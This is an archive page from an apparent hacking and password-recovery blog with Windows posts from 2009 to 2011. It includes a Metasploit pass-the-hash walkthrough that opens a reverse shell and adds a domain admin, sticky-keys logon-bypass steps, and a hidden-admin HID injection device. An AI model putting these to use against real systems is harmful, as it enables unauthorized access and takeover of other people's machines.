What's My Pass? » windows

The new threat

admin — Sat, 12 Feb 2011 17:58:14 +0000

Programmable embedded devices have the capability of being detected as a HID device , just like a keyboard or mouse. So if you have physical access and a minute alone you can compromise a system with something the size of your thumb. The possibilities are endless, HTTP/FTP download, injecting binaries into debug or Powershell etc.. Also this device is cross platform which means Windows,Linux,UNIX and Apple are all vulnerable.

Here’s an example project we made for a Windows7 box that adds a new Admin user to the system and hides that user from the logon screen. the whole process takes about 16 seconds , with most of the time taken by the device being detected as a keyboard and the driver installed. The device costs about $20 and can be found here

BitLocker password cracker

admin — Wed, 29 Sep 2010 16:28:17 +0000

Passware Inc. says it has come up with a way to access files on USB drives secured by the BitLocker encryption feature of Microsoft Windows.

They announced this week the release of Passware Kit Forensic version 10.1. The vendor said its software now lets investigators recover BitLocker encryption keys and getting “full access” to the contents of encrypted disks.

Microsoft added its BitLocker hard-disk encryption feature to the “ultimate” and “enterprise” versions of its Windows Vista and Windows 7 operating systems, in response to greater concern over data losses and breaches. It is also present in Windows Server 2008 and Windows Server 2008 R2.

Passware’s target market is law enforcement, said the company’s marketing manager, Nataly Koukoushkina.

She added users need physical access to computers in order to use Passware to defeat BitLocker encryption.

“That’s not easy for hackers,” she said. “We developed it for investigative purposes only.”

Passware launched the tool at the a training conference held by the High Technology Crime Investigation Association (HTCIA) in Atlanta.

The software costs US$795 and includes a year of free updates, Koukoushkina said, adding the BitLocker feature of Windows stores the encryption keys in a computer’s memory.

“We are using this vulnerability in order to decrypt the BitLocker hard disk,” she said. “Now the enhancement is for portable disk USB drives.”

Passware, who says its customers include the U.S. Department of Defense, makes software designed to either recover or reset software for a variety of document types, including Adobe Acrobat, plus Microsoft Word, Excel and Access.

The enterprise version will scan machines for password-protected files and scan the physical memory image file for disks encrypted with either BitLocker or TrueCrypt. If a TrueCrypt volume is dismounted, then the Passware software does a brute force attack.

Windows Live Messenger Recovery

admin — Mon, 13 Sep 2010 03:47:59 +0000

Windows Live Messenger (formerly MSN Messenger) is an instant messaging client created by Microsoft. As of June 2009 it had over 330 million active users. From version 8.0, Live Messenger stores your saved password in your Windows Credential record. Live Messenger Recovery can decrypt your saved passwords and display them in plaintext. Even if you uninstall Live Messenger your username/password can be left behind in your Credentials store, allowing our app to still recover it. Works for versions 8.0 and above.
Software Requirements

Processor: Pentium class or equivalent processor
RAM: 64MB RAM recommended
Hard Disk: 14kb free hard disk space
Supported Operating System: Windows 2k/2k3/XP/Vista/Win7

Trial and registration

Evaluation version is available for FREE download. This unregistered (demo) software recovers only the first 3 characters in password (rest is shown as ‘*’).

Download Live Recover Demo

689 downloads

In order to display full Password you should register for licensed Software.
Only $4.99!! All proceeds go to supporting this site!

Change your password with sticky keys

admin — Wed, 18 Aug 2010 22:56:36 +0000

Forgot the administrator password? There are many ways to access a Windows installation if you forgot the administrator password. Today I’ll show you another procedure to reset the Windows password by replacing the Sticky Keys application. This program allows you to use the function keys SHIFT, CTRL, ALT, or the Windows key by typing one key after the other instead of pressing them simultaneously with the second key. The main advantage of this password reset method is that you don’t need third-party software; another plus is that it is easy to carry out because no Registry hack is required, as when you offline enable the built-in administrator.

Please note that resetting the password from an account other than the corresponding user account always means that the user loses the credentials stored in the Windows Vault, stored Internet Explorer passwords, and files that you encrypted with the Encrypting File System (EFS). Of course, if you have a backup of these credentials, you can restore them; likewise, if you have exported the private EFS key, you can import it again after you have reset the password.

Like with all other solutions that allow you to reset the Windows password without having an account on the corresponding computer, you have to boot from a second operating system and access the Windows installation while it is offline.

You can do this with a bootable Windows PE USB stick or by using Windows RE. You can start Windows RE by booting the Windows Vista or Windows 7 setup DVD and then selecting “Repair” instead of “Install Windows.”

By the way, you can’t use the Windows XP boot CD for this purpose because its Recovery Console will ask for a password for the offline installation. However, you can use a Vista or Windows 7 DVD to reset a forgotten Windows administrator password on Windows XP.

This works because Windows RE, which is based on Vista or Windows 7, will let you launch a command prompt with access to an offline installation without requiring a password.

To reset a forgotten administrator password, follow these steps:

Boot from Windows PE or Windows RE and access the command prompt.
Find the drive letter of the partition where Windows is installed. In Vista and Windows XP, it is usually C:, in Windows 7, it is D: in most cases because the first partition contains Startup Repair. To find the drive letter, type C: (or D:, respectively) and search for the Windows folder. Note that Windows PE (RE) usually resides on X:.
Type the following command (replace “c:” with the correct drive letter if Windows is not located on C:):
copy c:\windows\system32\sethc.exe c:\
This creates a copy of sethc.exe to restore later.
Type this command to replace sethc.exe with cmd.exe:
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
Reboot your computer and start the Windows installation where you forgot the administrator password.
After you see the logon screen, press the SHIFT key five times.
You should see a command prompt where you can enter the following command to reset the Windows password (see screenshot above):
net user you_user_name new_password
If you don’t know your user name, just type net user to list the available user names.
You can now log on with the new password.

I recommend that you replace sethc.exe with the copy you stored in the root folder of your system drive in step 3. For this, you have to boot up again with Windows PE or RE because you can’t replace system files while the Windows installation is online.

Via: 4sysops.com

Kon Boot 1.1

Dev Team — Mon, 10 May 2010 09:08:13 +0000

We reviewed Kon Boot 1.0 last year HERE which was a great breakthrough program that allowed you to boot into a Windows machine and bypass the logon screen without entering a password. To accomplish this, Kon Boot hooks the bios on the fly subverting the Windows kernel authentication temporarily and allowing you access. Since this is a temporary process the computer is back to normal when you reboot. This allowed you to access the computer without having to take the time to reset the password or crack it, and it left the computer untouched. Now, a year later, Kon Boot v1.1 has been released with new features, such as booting from floppy,CD, or usb, privilege escalation support which allows you to gain SYSTEM privileges from ANY account on the system. For example, you can boot from Kon Boot and log in as Guest and run ‘Net User’ command to add a new user,reset admin passwords etc as SYSTEM

It also has a bunch of new bug fixes/updates.

- Added 64-bit environment support
- Added USB support tools (grldr, klmemusb)
- Added debugging code to make it easier to track down various compatibility problems
- Fixed bug in Windows 7 support failures
- Removed Linux support
- Many performance improvements to source code
- Improved BIOS support by reducing code size significantly

Unfortunately it is no longer free. But for a meager price of $15.99 for a personal license, it gives you free updates and support for a period of 6 months. You can still use it without restrictions after that period.
They also offer a commercial license, for $75.99 with 1 year of support and updates, allowing you to use on business environment.
To purchase Kon Boot v1. 1,visit their website http://www.kryptoslogic.com

We are also giving away 10 personal licenses this week to some lucky readers!!! More details to come!!!

DPAPIck – Recover offline passwords

Dev Team — Tue, 06 Apr 2010 20:08:14 +0000

This is a forensic tool to deal, in an offline way, with Microsoft Windows® protected data, using the DPAPI (Data Protection API).
A non-exhaustive list of those recoverable secrets are :

* EFS certificates
* MSN Messenger credentials
* Internet Explorer form passwords
* Outlook passwords
* Google Talk credentials
* Google Chrome form passwords
* Wireless network keys (WEP key and WPA-PMK)
* Skype credentials

Of course you need to know the user’s current password, you can recover it from the SAM.
Download Here
You can also read an excellent article on the undocumented process of recovering DPAPI passwords here

How to own a Windows Domain 2.0

Dev Team — Sat, 20 Feb 2010 16:42:22 +0000

Back in October we showed you a video on how to own a Windows domain by passing the hash from the local admin account to the domain server to add a new domain admin account. This newer version makes the task much easier using Backtrack4 and metasploit.



The commands used in the video:

mount /dev/sda1 /mnt/sda1 cd /mnt/sda1/WINDOWS/system32/config samdump2 system SAM msfconsole use windows/smb/psexec exploit -p windows/meterpreter/reverse_tcp -o LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123...:5654... -j sessions -i 1 use incognito list_tokens -u impersonate_token mydomain\\domainadmin execute -f cmd.exe -i -t net user hack MPass5678 /add /domain net group "Domain Admins" hack /add /domain PWNED
Lessons learned :
1. never reuse admin passwords, even if they are technically unbreakable
2. everything is a lot easier with the right tools.

Attack is compatible with WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7

How to View Your Windows 7 Homegroup Password

admin — Thu, 03 Dec 2009 19:42:56 +0000

If you have forgot your Windows 7 homegroup password, then this will show you how to view or print it to see what it is again. You must have this password to be able to join a computer to your homegroup.

HomeGroup makes it easy to share pictures, music, documents, videos, and printers with other people on your home network. You would have had to created a homegroup first before you will have a password to use to join other computer to your homegroup.

1. Open the Control Panel (all items view), and click on the Network and Sharing Center icon.
2. Click on the Choose homegroup and sharing options link.
3. Click on the View or print homegroup password link.
4. Write down this password down, or click on Print this page to print the passoword. When done, close this window.

NOTE: The password is case sensitive, so it will need to be typed exactly as it appears here when used to join a computer to the homegroup.

How to own a Windows Domain

Dev Team — Sun, 25 Oct 2009 17:34:05 +0000

Security tube has a nice video on how to gain domain admin access from a workstation using some simple tools

http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx

GetKey 3.0

Dev Team — Sun, 13 Sep 2009 02:57:43 +0000

GetKey 3.0 easily recovers Windows and Microsoft Office Product Keys. It also can recover the keys from a slaved/offline drive or run from a WindowsPE CD,such as BartsPE or Hiren’s BootDisk! It even decodes what type of Windows is installed on the offline drive by decoding the Microsoft Product Code and Channel ID, so if you have you’re a tech working on a dead system you can grab the right Windows CD to install. GetKey is written in pure assembly language, it’s fully portable and is only 14kb in size .

Software Requirements

Processor: Pentium class or equivalent processor
RAM: 64MB RAM recommended
Hard Disk: 14kb free hard disk space
Supported Operating System: Windows 98/ME/NT/2000/2003/XP/Vista/Win7 *32bit only!

We are offering this for only Only $4.99!! All proceeds go to supporting this site!